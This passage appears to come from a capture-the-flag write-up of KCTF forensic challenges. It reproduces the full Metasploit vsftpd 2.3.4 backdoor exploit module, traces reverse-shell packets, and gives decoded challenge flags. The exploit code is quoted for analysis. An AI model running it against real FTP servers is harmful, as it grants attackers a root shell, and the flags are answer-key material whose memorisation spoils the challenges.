class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 682px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b2485a4ccc1936b8efb5b7c4b315f79a/160a3/image-20240122221711629.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 101.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAACYklEQVQ4y5VUi5KiMBDk/7/xPF1FFgRJQiCEZ990AAst3btL1VRiMD2T7p5EheqhsxhlUYCjaRpoo1HXNcqyhDEV+r4P3+Z5DvM4jui6HnXTo2l7uG7CNqJWNqxWAuTQdx1a7wOYc62Eg5P9jvttG4C9rAnGb53s8bvvBng5x4RR33eSyWEYBmit4VsfDvMAZ1bofQelVEhibR0OV1UVwDkzgVZaMEZEXT/IQb9WJNEuMz8y4zTNT/PnWCiJRu9gK43GNXJoxDgNAkbOZrwbG8Cn71FrHa7nHMdjivRbIb4UyDKNLNWI4xJ5XknFQofywvPwFnwfUZ4bHH+nuJwLnE5pAL5cbvj6WiKOcyRJEdZZWgpnVng1ciP3UvFaoZOrKl2KMFbUtUK6CbapKiOhg1DWViJKCQpI8ag2rfMKGCqkIPTeJsrmuf8dG2hE2bPshruYOBdz13WzqjoFZZd5+ovCuwrJhdYm8MLZWovyXkCVSq6pcb8Lb7I3js8JtoS8Oml4ANLArJJAnMNaOuUny+yDwHs+I/IWVBMeCUYRqGQjV+cegwnYDZvBp3mJt4DNWiH7d6syrCsbgNlqTNiGXsVbPrn3dGUCGbEJK9muzQrNuiZwt3tx9sG+Zs8/AP+Vq0/Bl2ifLOrlOk7MHCoUI9PoM7ZeXeK1G1699+RDldxxltY7HBIcfiXSepl4skJyVdJyJYrCPEj/+bFYKyx1g7M8CDx8ErDTKUOaFgL8jav08fV6Cz6kUNqYwKeWN5JC8a2kP58q9K2TPwvxcu2ln6ull/m7XoD4Nu4NzYq32FfH8QeMIhhAdhj1iQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b2485a4ccc1936b8efb5b7c4b315f79a/8ac56/image-20240122221711629.webp 240w,\n/static/b2485a4ccc1936b8efb5b7c4b315f79a/d3be9/image-20240122221711629.webp 480w,\n/static/b2485a4ccc1936b8efb5b7c4b315f79a/57e27/image-20240122221711629.webp 682w\"\n              sizes=\"(max-width: 682px) 100vw, 682px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b2485a4ccc1936b8efb5b7c4b315f79a/8ff5a/image-20240122221711629.png 240w,\n/static/b2485a4ccc1936b8efb5b7c4b315f79a/e85cb/image-20240122221711629.png 480w,\n/static/b2485a4ccc1936b8efb5b7c4b315f79a/160a3/image-20240122221711629.png 682w\"\n            sizes=\"(max-width: 682px) 100vw, 682px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b2485a4ccc1936b8efb5b7c4b315f79a/160a3/image-20240122221711629.png\"\n            alt=\"image-20240122221711629\"\n            title=\"image-20240122221711629\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><code class=\"language-text\">KCTF{metasploit}</code> is accepted as-is, but since we have the chance, let’s take a look inside.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">##\n# $Id<span class=\"token operator\">:</span> vsftpd_234_backdoor<span class=\"token punctuation\">.</span>rb <span class=\"token number\">13099</span> <span class=\"token number\">2011</span><span class=\"token operator\">-</span><span class=\"token number\">07</span><span class=\"token operator\">-</span><span class=\"token number\">05</span> <span class=\"token number\">05</span><span class=\"token operator\">:</span><span class=\"token number\">20</span><span class=\"token operator\">:</span><span class=\"token number\">47</span>Z hdm $\n##\n\n##\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token expression\">This file is part of the Metasploit Framework and may be subject to</span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token directive keyword\">redistribution</span> <span class=\"token expression\">and commercial restrictions<span class=\"token punctuation\">.</span> Please see the Metasploit</span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token expression\">Framework web site <span class=\"token keyword\">for</span> more information on licensing and terms of use<span class=\"token punctuation\">.</span></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token directive keyword\">http</span><span class=\"token expression\"><span class=\"token operator\">:</span></span><span class=\"token comment\">//metasploit.com/framework/</span></span>\n##\n\nrequire <span class=\"token char\">'msf/core'</span>\n\nclass Metasploit3 <span class=\"token operator\">&lt;</span> Msf<span class=\"token operator\">::</span>Exploit<span class=\"token operator\">::</span>Remote\nRank <span class=\"token operator\">=</span> ExcellentRanking\n\ninclude Msf<span class=\"token operator\">::</span>Exploit<span class=\"token operator\">::</span>Remote<span class=\"token operator\">::</span>Tcp\n\ndef <span class=\"token function\">initialize</span><span class=\"token punctuation\">(</span>info <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n<span class=\"token function\">super</span><span class=\"token punctuation\">(</span><span class=\"token function\">update_info</span><span class=\"token punctuation\">(</span>info<span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Name'</span>           <span class=\"token operator\">=</span><span class=\"token operator\">></span> 'VSFTPD v2<span class=\"token punctuation\">.</span><span class=\"token number\">3.4</span> Backdoor Command Execution'<span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Description'</span>    <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token operator\">%</span>q<span class=\"token punctuation\">{</span>\nThis module exploits a malicious backdoor that was added to theVSFTPD download\narchive<span class=\"token punctuation\">.</span> This backdoor was introdcued into the vsftpd<span class=\"token operator\">-</span><span class=\"token number\">2.3</span><span class=\"token number\">.4</span><span class=\"token punctuation\">.</span>tar<span class=\"token punctuation\">.</span>gz archive between\nJune <span class=\"token number\">30</span>th <span class=\"token number\">2011</span> and July <span class=\"token number\">1</span>st <span class=\"token number\">2011</span> according to the most recent information\navailable<span class=\"token punctuation\">.</span> This backdoor was removed on July <span class=\"token number\">3</span>rd <span class=\"token number\">2011.</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Author'</span>         <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token punctuation\">[</span> <span class=\"token char\">'hdm'</span><span class=\"token punctuation\">,</span> <span class=\"token char\">'mc'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'License'</span>        <span class=\"token operator\">=</span><span class=\"token operator\">></span> MSF_LICENSE<span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Version'</span>        <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token char\">'$Revision: 13099 $'</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'References'</span>     <span class=\"token operator\">=</span><span class=\"token operator\">></span>\n<span class=\"token punctuation\">[</span>\n<span class=\"token punctuation\">[</span> <span class=\"token char\">'URL'</span><span class=\"token punctuation\">,</span> <span class=\"token char\">'http://pastebin.com/AetT9sS5'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">[</span> <span class=\"token char\">'URL'</span><span class=\"token punctuation\">,</span> 'http<span class=\"token operator\">:</span><span class=\"token comment\">//scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],</span>\n<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Privileged'</span>     <span class=\"token operator\">=</span><span class=\"token operator\">></span> true<span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Platform'</span>       <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token punctuation\">[</span> <span class=\"token char\">'unix'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Arch'</span>           <span class=\"token operator\">=</span><span class=\"token operator\">></span> ARCH_CMD<span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Payload'</span>        <span class=\"token operator\">=</span><span class=\"token operator\">></span>\n<span class=\"token punctuation\">{</span>\n<span class=\"token char\">'Space'</span>    <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token number\">2000</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'BadChars'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token char\">''</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'DisableNops'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> true<span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Compat'</span>      <span class=\"token operator\">=</span><span class=\"token operator\">></span>\n<span class=\"token punctuation\">{</span>\n<span class=\"token char\">'PayloadType'</span>    <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token char\">'cmd_interact'</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'ConnectionType'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token char\">'find'</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'Targets'</span>        <span class=\"token operator\">=</span><span class=\"token operator\">></span>\n<span class=\"token punctuation\">[</span>\n<span class=\"token punctuation\">[</span> <span class=\"token char\">'Automatic'</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">{</span> <span class=\"token punctuation\">}</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'DisclosureDate'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token char\">'Jul 3 2011'</span><span class=\"token punctuation\">,</span>\n<span class=\"token char\">'DefaultTarget'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token function\">register_options</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span> Opt<span class=\"token operator\">::</span><span class=\"token function\">RPORT</span><span class=\"token punctuation\">(</span><span class=\"token number\">21</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> self<span class=\"token punctuation\">.</span>class<span class=\"token punctuation\">)</span>\nend\n\ndef exploit\n\nnsock <span class=\"token operator\">=</span> self<span class=\"token punctuation\">.</span><span class=\"token function\">connect</span><span class=\"token punctuation\">(</span>false<span class=\"token punctuation\">,</span> <span class=\"token punctuation\">{</span><span class=\"token char\">'RPORT'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token number\">6200</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span> rescue nil\n<span class=\"token keyword\">if</span> nsock\n<span class=\"token function\">print_status</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"The port used by the backdoor bind listener is already open\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token function\">handle_backdoor</span><span class=\"token punctuation\">(</span>nsock<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">return</span>\nend\n\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token expression\">Connect to the FTP service port first</span></span>\nconnect\n\nbanner <span class=\"token operator\">=</span> sock<span class=\"token punctuation\">.</span><span class=\"token function\">get_once</span><span class=\"token punctuation\">(</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">30</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>to_s\n<span class=\"token function\">print_status</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Banner: #{banner.strip}\"</span><span class=\"token punctuation\">)</span>\n\nsock<span class=\"token punctuation\">.</span><span class=\"token function\">put</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"USER #{rand_text_alphanumeric(rand(6)+1)}:)\\r\\n\"</span><span class=\"token punctuation\">)</span>\nresp <span class=\"token operator\">=</span> sock<span class=\"token punctuation\">.</span><span class=\"token function\">get_once</span><span class=\"token punctuation\">(</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">30</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>to_s\n<span class=\"token function\">print_status</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"USER: #{resp.strip}\"</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">if</span> resp <span class=\"token operator\">=</span><span class=\"token operator\">~</span> <span class=\"token operator\">/</span><span class=\"token operator\">^</span><span class=\"token number\">530</span> <span class=\"token operator\">/</span>\n<span class=\"token function\">print_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"This server is configured for anonymous only and the backdoor code cannot be reached\"</span><span class=\"token punctuation\">)</span>\ndisconnect\n<span class=\"token keyword\">return</span>\nend\n\n<span class=\"token keyword\">if</span> resp <span class=\"token operator\">!</span><span class=\"token operator\">~</span> <span class=\"token operator\">/</span><span class=\"token operator\">^</span><span class=\"token number\">331</span> <span class=\"token operator\">/</span>\n<span class=\"token function\">print_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"This server did not respond as expected: #{resp.strip}\"</span><span class=\"token punctuation\">)</span>\ndisconnect\n<span class=\"token keyword\">return</span>\nend\n\nsock<span class=\"token punctuation\">.</span><span class=\"token function\">put</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"PASS #{rand_text_alphanumeric(rand(6)+1)}\\r\\n\"</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token expression\">Do not bother reading the response from password<span class=\"token punctuation\">,</span> just try the backdoor</span></span>\nnsock <span class=\"token operator\">=</span> self<span class=\"token punctuation\">.</span><span class=\"token function\">connect</span><span class=\"token punctuation\">(</span>false<span class=\"token punctuation\">,</span> <span class=\"token punctuation\">{</span><span class=\"token char\">'RPORT'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token number\">6200</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span> rescue nil\n<span class=\"token keyword\">if</span> nsock\n<span class=\"token function\">print_good</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Backdoor service has been spawned, handling...\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token function\">handle_backdoor</span><span class=\"token punctuation\">(</span>nsock<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">return</span>\nend\n\ndisconnect\n\nend\n\ndef <span class=\"token function\">handle_backdoor</span><span class=\"token punctuation\">(</span>s<span class=\"token punctuation\">)</span>\n\ns<span class=\"token punctuation\">.</span><span class=\"token function\">put</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"id\\n\"</span><span class=\"token punctuation\">)</span>\n\nr <span class=\"token operator\">=</span> s<span class=\"token punctuation\">.</span><span class=\"token function\">get_once</span><span class=\"token punctuation\">(</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">5</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>to_s\n<span class=\"token keyword\">if</span> r <span class=\"token operator\">!</span><span class=\"token operator\">~</span> <span class=\"token operator\">/</span>uid<span class=\"token operator\">=</span><span class=\"token operator\">/</span>\n<span class=\"token function\">print_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"The service on port 6200 does not appear to be a shell\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token function\">disconnect</span><span class=\"token punctuation\">(</span>s<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">return</span>\nend\n\n<span class=\"token function\">print_good</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"UID: #{r.strip}\"</span><span class=\"token punctuation\">)</span>\n\ns<span class=\"token punctuation\">.</span><span class=\"token function\">put</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"nohup \"</span> <span class=\"token operator\">+</span> payload<span class=\"token punctuation\">.</span>encoded <span class=\"token operator\">+</span> <span class=\"token string\">\" >/dev/null 2>&amp;1\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token function\">handler</span><span class=\"token punctuation\">(</span>s<span class=\"token punctuation\">)</span>\nend\n\nend</code></pre></div>\n<p>Reference: <a href=\"https://www.exploit-db.com/exploits/17491\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) - Unix remote Exploit</a></p>\n<p>Looking at the code, we can see that the way the attack query sent to the FTP service is constructed, as well as the commands executed after obtaining the shell, match the Metasploit script.</p>\n<h3 id=\"hidden-fileforensic\" style=\"position:relative;\"><a href=\"#hidden-fileforensic\" aria-label=\"hidden fileforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Hidden File(Forensic)</h3>\n<blockquote>\n<p>What’s the flag of the hidden file?</p>\n<p>Please use the attachment of the first challenge.</p>\n</blockquote>\n<p>Tracing the series of reverse-shell packets shows that data from a file called <code class=\"language-text\">.Fl4g.tXT</code> was retrieved, as shown below.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">.<span class=\"token punctuation\">]</span><span class=\"token number\">0</span><span class=\"token punctuation\">;</span>root@kctf: /root<span class=\"token punctuation\">..</span><span class=\"token punctuation\">[</span>01<span class=\"token punctuation\">;</span>32mroot@kctf.<span class=\"token punctuation\">[</span>00m:.<span class=\"token punctuation\">[</span>01<span class=\"token punctuation\">;</span>34m/root.<span class=\"token punctuation\">[</span>00m<span class=\"token comment\"># cat .Fl4g.tXT</span>\n<span class=\"token function\">cat</span> .Fl4g.tXT\nHi<span class=\"token operator\">!</span> \nYou<span class=\"token string\">'ve come this far analyzing the file. Good Job. :D \nHere'</span>s something <span class=\"token keyword\">for</span> you. Hope you get it<span class=\"token punctuation\">..</span> <span class=\"token punctuation\">;</span>P\n\n37n3vq6rp6k05ov33o5fy5b33sj3rq2sy4p56735853h9</code></pre></div>\n<p>This string, <code class=\"language-text\">37n3vq6rp6k05ov33o5fy5b33sj3rq2sy4p56735853h9</code>, looks suspicious, but as-is it is impossible to tell what kind of data it is.</p>\n<p>Judging from other people’s writeups, apparently the intended solution was to guess the encryption method.</p>\n<p>If you know the Twin-Hex Cipher, you could probably guess that the output looks very similar. (I didn’t.)</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 371px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/83bdb78cbf124625282a89f5116042f0/d4635/image-20240122141724219.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 84.16666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAIAAABSJhvpAAAACXBIWXMAAAsTAAALEwEAmpwYAAACWElEQVQ4y42S72+aQBjH+ceXrP/BsmXv9m5pq7RaFBEQrK2I82pbkeLUToVDFBR/toBWK+zQdHXL0vTJJ0++z3PP3eUuX4x/jOcdVnAyosuJHh/mLT8WSPMFl0fNgsPt8p8SzRc9HjvqfiU1PHEf43oU2yUzRorRk0yXTKsEDQmqcxZTjhkjxfcoonFCqQTRxNMwcVbHaZXA6DFenynNca0+VhoT5X5W17wOXLRVr4Vyx/mlui24DDvQa6uodFr6ttS8Npa2o4Zl6C2otaFpmLZlr9dB4L+wi/3SfwWjR/jDar5t+i+T/jtBm6Pz5Xaz77+e/b4I3zxZj1bBchG4T8HC9V0kvMDxAtfdPLpr5w0wahhhC0xevBBAns2xoizc1Mpys1pRbmVdqjyDylMpZAUqq/0MpBVAHxbJ3fKFyuXFTZYtMtdaSYI3VShdNYBiV+WgfBdc71BexA60hHHzmDjLskaSN9PZQZrRE5xFpdRY1qbzUy5nZajWGd0hOAM1Cd6kOZ1k9dS5xUg+wNjpifQMgJcHbh54AnAuiw85cXpeXoi36xICOMKVWygvxZIjXC+LV46AlsqeKPtlLDn8zgziGZvITkl+kuTGidycykzjqWFkR3oUpRB2NBR2ZKcR5OAYO9S/kDB6Kh+e1I64PpVoRtkuhRvfPkkfPssHWz7+n7sDjJ2cNue1+3Fdsao/h/KdKSlmpWHXjIU+fLYGa/MNMGaMw76GvGl0jX6v1zf6htaFUHccN/TLxt/34z9sHfb0lz33TLp5m9Db8+UMTW/QLXvxHnv+BrCGetSLAESnAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/83bdb78cbf124625282a89f5116042f0/8ac56/image-20240122141724219.webp 240w,\n/static/83bdb78cbf124625282a89f5116042f0/65f07/image-20240122141724219.webp 371w\"\n              sizes=\"(max-width: 371px) 100vw, 371px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/83bdb78cbf124625282a89f5116042f0/8ff5a/image-20240122141724219.png 240w,\n/static/83bdb78cbf124625282a89f5116042f0/d4635/image-20240122141724219.png 371w\"\n            sizes=\"(max-width: 371px) 100vw, 371px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/83bdb78cbf124625282a89f5116042f0/d4635/image-20240122141724219.png\"\n            alt=\"image-20240122141724219\"\n            title=\"image-20240122141724219\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Decoding it on the following site reveals that the correct flag is <code class=\"language-text\">KCTF{ExPloItiNg_S3RvEr_Is_fUN}</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 513px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/4b7f54345912e795d9b36b140474eedf/267f6/image-20240122141845248.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 80.41666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAIAAACZeshMAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB70lEQVQoz6WSC0/aUBiG+/9/BNski0MR47i0hdLTm6MTcZt1Q3HCaUtvnFIuRRNLL/sKbHFLXLJ58uTN853knJP0LcUv30tLFhAhw01uZcGISwYSRmFOA+KKYYMKGxyxs8oW6sQutg1a9njJbZ8SBCLYLd5k0JiFEVlNcNHhkNlEE6aMC4dPoOSAHXuW6eh4PBzgW8PWTdfAFgYMRzcdrNv6aDzENtZh08DhwyrJsjhLAEqeMmmcxXESr2MgiZMciE1uDHw3bCXN0i35y9m/rnQHhUj91rgZGNdXI+1MU3ta71zrauHFIPt6HWt/sgYuQfrRZT/6QqFprYs7XVPt6Arqc8I3Xrzh5YD7sELqvaA+iJ178exRBrqRApyvT4FPqfo5+0iJYU2at3if5gnQaNrVzkpQAp4bNySfk31O8lrShEMOi9ym4LVEtwl+8aheZT2qQUptv8YHdWFBoxnNLU7q5B0dHNCzw8bPrE9LkI2gBFIPwEs1sl+d7FNV5y3SGW5IKw4STY6xKod3hfLdq6PRm/Lw9cH3QmW0d4yLx3hvQ3HnehGgZJ/xCSG+b1nOhBDHsqdeMHHJch6Gs9Cz3SiKnvvqUBXzWwvppsN8JbnmjaTPQSnQc7o7lW9shqd3/aXv//pJfh1WXnL4JS//ANWIWyqY9QVsAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/4b7f54345912e795d9b36b140474eedf/8ac56/image-20240122141845248.webp 240w,\n/static/4b7f54345912e795d9b36b140474eedf/d3be9/image-20240122141845248.webp 480w,\n/static/4b7f54345912e795d9b36b140474eedf/3be34/image-20240122141845248.webp 513w\"\n              sizes=\"(max-width: 513px) 100vw, 513px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/4b7f54345912e795d9b36b140474eedf/8ff5a/image-20240122141845248.png 240w,\n/static/4b7f54345912e795d9b36b140474eedf/e85cb/image-20240122141845248.png 480w,\n/static/4b7f54345912e795d9b36b140474eedf/267f6/image-20240122141845248.png 513w\"\n            sizes=\"(max-width: 513px) 100vw, 513px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/4b7f54345912e795d9b36b140474eedf/267f6/image-20240122141845248.png\"\n            alt=\"image-20240122141845248\"\n            title=\"image-20240122141845248\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Reference: <a href=\"https://www.calcresult.com/misc/cyphers/twin-hex.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Twin-Hex Cypher encoder and decoder from CalcResult Universal Calculators</a></p>\n<h3 id=\"confidentialforensic\" style=\"position:relative;\"><a href=\"#confidentialforensic\" aria-label=\"confidentialforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Confidential(Forensic)</h3>\n<blockquote>\n<p>There’s something confidential. Can you find it?</p>\n</blockquote>\n<p>Enumerating the HTTP objects shows that a file called <code class=\"language-text\">maybeconfidential.zip</code> was stolen.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 626px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/3557a14f1da97eeea8d6ad9ac1b1d3f4/af590/image-20240122142146880.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 21.666666666666668%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA3UlEQVQI1xXJyXKCMAAAUL6kh6oFAglhCwgkMZQ1QdZhGHVse2h79P+Ptdf3NMFOIfZ4wtZxJm4A9npKjuu4HH1i6wCZNjRsBGBTVF0jVS3PrYKmZRv/pTH1HrZp1J3UfWJLZXDs1Yn6XOhYBJJGPQ9U9sRik8mQi7WtrwNf6rQXJne1bKvxh3BvefvY4IW9nDG6cPnYonupL/Fhjg4zeR18+tOFX2X23YnfgdwK/5rvpkDjGYt9QmM6dX3kBdYbSEkyqeGJ0LAwQA6AjoUqUaqqlWVD48TSTQRsB6A/6eg6UaihEeQAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/3557a14f1da97eeea8d6ad9ac1b1d3f4/8ac56/image-20240122142146880.webp 240w,\n/static/3557a14f1da97eeea8d6ad9ac1b1d3f4/d3be9/image-20240122142146880.webp 480w,\n/static/3557a14f1da97eeea8d6ad9ac1b1d3f4/63b03/image-20240122142146880.webp 626w\"\n              sizes=\"(max-width: 626px) 100vw, 626px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/3557a14f1da97eeea8d6ad9ac1b1d3f4/8ff5a/image-20240122142146880.png 240w,\n/static/3557a14f1da97eeea8d6ad9ac1b1d3f4/e85cb/image-20240122142146880.png 480w,\n/static/3557a14f1da97eeea8d6ad9ac1b1d3f4/af590/image-20240122142146880.png 626w\"\n            sizes=\"(max-width: 626px) 100vw, 626px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            